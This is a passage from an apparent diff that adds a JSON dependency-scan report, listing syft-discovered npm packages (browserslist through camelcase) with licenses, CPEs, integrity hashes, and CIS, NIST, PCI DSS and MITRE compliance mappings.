"Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "4688a05ee871df84", + "name": "browserslist", + "version": "4.28.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:browserslist_project:browserslist:4.28.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/browserslist@4.28.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/browserslist/-/browserslist-4.28.2.tgz", + "integrity": "sha512-48xSriZYYg+8qXna9kwqjIVzuQxi+KYWp2+5nCYnYKPTr0LvD89Jqk2Or5ogxz0NUMfIjhh2lIUX/LyX9B4oIg==", + "dependencies": { + "baseline-browser-mapping": "^2.10.12", + "caniuse-lite": "^1.0.30001782", + "electron-to-chromium": "^1.5.328", + "node-releases": "^2.0.36", + "update-browserslist-db": "^1.2.3" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4b1e259ceb7e99ec", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: buffer-equal-constant-time 1.0.1", + "title": "buffer-equal-constant-time 1.0.1", + "description": "Package discovered: buffer-equal-constant-time 1.0.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "ea42e35a908d5ccd", + "name": "buffer-equal-constant-time", + "version": "1.0.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "BSD-3-Clause", + "spdxExpression": "BSD-3-Clause", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:buffer-equal-constant-time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer-equal-constant-time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_equal_constant_time:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_equal_constant_time:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer-equal-constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer-equal-constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_equal_constant:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_equal_constant:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer-equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer-equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_equal:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_equal:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer:buffer-equal-constant-time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer:buffer_equal_constant_time:1.0.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/buffer-equal-constant-time@1.0.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/buffer-equal-constant-time/-/buffer-equal-constant-time-1.0.1.tgz", + "integrity": "sha512-zRpUiDwd/xk6ADqPMATG8vc9VPrkck7T07OIx0gnjmJAnHnTVXNQG3vfvWNuiZIkwu9KrKdA1iJKfsfTVxE6NA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "991f80bfd3038fd0", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: buffer-from 1.1.2", + "title": "buffer-from 1.1.2", + "description": "Package discovered: buffer-from 1.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "98e22d90241a7628", + "name": "buffer-from", + "version": "1.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:buffer-from:buffer-from:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer-from:buffer_from:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_from:buffer-from:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer_from:buffer_from:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer:buffer-from:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:buffer:buffer_from:1.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/buffer-from@1.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/buffer-from/-/buffer-from-1.1.2.tgz", + "integrity": "sha512-E+XQCRwSbaaiChtv6k6Dwgc+bx+Bs6vuKJHHl5kox/BaKbhiXzqQOwK4cO22yElGp2OCmjwVhT3HmxgyPGnJfQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "e092abe833e5a95d", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: busboy 1.6.0", + "title": "busboy 1.6.0", + "description": "Package discovered: busboy 1.6.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "3009b8237fb85cf0", + "name": "busboy", + "version": "1.6.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:busboy:busboy:1.6.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/busboy@1.6.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/busboy/-/busboy-1.6.0.tgz", + "integrity": "sha512-8SFQbg/0hQ9xy3UNTB0YEnsNBbWfhf7RtnzpL7TkBiTBRfrQ9Fxcnz7VJsleJpyp6rVLvXiuORqjlHi5q+PYuA==", + "dependencies": { + "streamsearch": "^1.1.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "81eb78c52edce0ec", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: bytes 3.1.2", + "title": "bytes 3.1.2", + "description": "Package discovered: bytes 3.1.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "f9a24c0655f5cc44", + "name": "bytes", + "version": "3.1.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:bytes:bytes:3.1.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/bytes@3.1.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/bytes/-/bytes-3.1.2.tgz", + "integrity": "sha512-/Nf7TyzTx6S3yRJObOAV7956r8cr2+Oj8AC5dt8wSP3BQAoeX58NoHyCU8P8zGkNXStjTSi6fzO6F0pBdcYbEg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a35927eb13a2081e", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: call-bind-apply-helpers 1.0.2", + "title": "call-bind-apply-helpers 1.0.2", + "description": "Package discovered: call-bind-apply-helpers 1.0.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "2303cf02934afa6a", + "name": "call-bind-apply-helpers", + "version": "1.0.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:call-bind-apply-helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call-bind-apply-helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bind_apply_helpers:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bind_apply_helpers:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call-bind-apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call-bind-apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bind_apply:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bind_apply:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call-bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call-bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bind:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bind:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call:call-bind-apply-helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call:call_bind_apply_helpers:1.0.2:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/call-bind-apply-helpers@1.0.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/call-bind-apply-helpers/-/call-bind-apply-helpers-1.0.2.tgz", + "integrity": "sha512-Sp1ablJ0ivDkSzjcaJdxEunN5/XvksFJ2sMBFfq6x0ryhQV/2b/KwFe21cMpmHtPOSij8K99/wSfoEuTObmuMQ==", + "dependencies": { + "es-errors": "^1.3.0", + "function-bind": "^1.1.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "4e5277c95313e881", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: call-bound 1.0.4", + "title": "call-bound 1.0.4", + "description": "Package discovered: call-bound 1.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "23c8e695a4ffce79", + "name": "call-bound", + "version": "1.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:call-bound:call-bound:1.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call-bound:call_bound:1.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bound:call-bound:1.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call_bound:call_bound:1.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call:call-bound:1.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:call:call_bound:1.0.4:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/call-bound@1.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/call-bound/-/call-bound-1.0.4.tgz", + "integrity": "sha512-+ys997U96po4Kx/ABpBCqhA9EuxJaQWDQg7295H4hBphv3IZg0boBKuwYpt4YXp6MZ5AmZQnU/tyMTlRpaSejg==", + "dependencies": { + "call-bind-apply-helpers": "^1.0.2", + "get-intrinsic": "^1.3.0" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "a4cb8d0a4eb7503f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: camelcase 5.3.1", + "title": "camelcase 5.3.1", + "description": "Package discovered: camelcase 5.3.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "98453e2c1718f20f", + "name": "camelcase", + "version": "5.3.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:camelcase:camelcase:5.3.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/camelcase@5.3.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/camelcase/-/camelcase-5.3.1.tgz", + "integrity": "sha512-L28STB170nwWS63UjtlEOE3dldQApaJXZkOI1uMFfzf3rRuPegHaHesyee+YxQ+W6SvRDQV6UrdOdRiR153wJg==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] 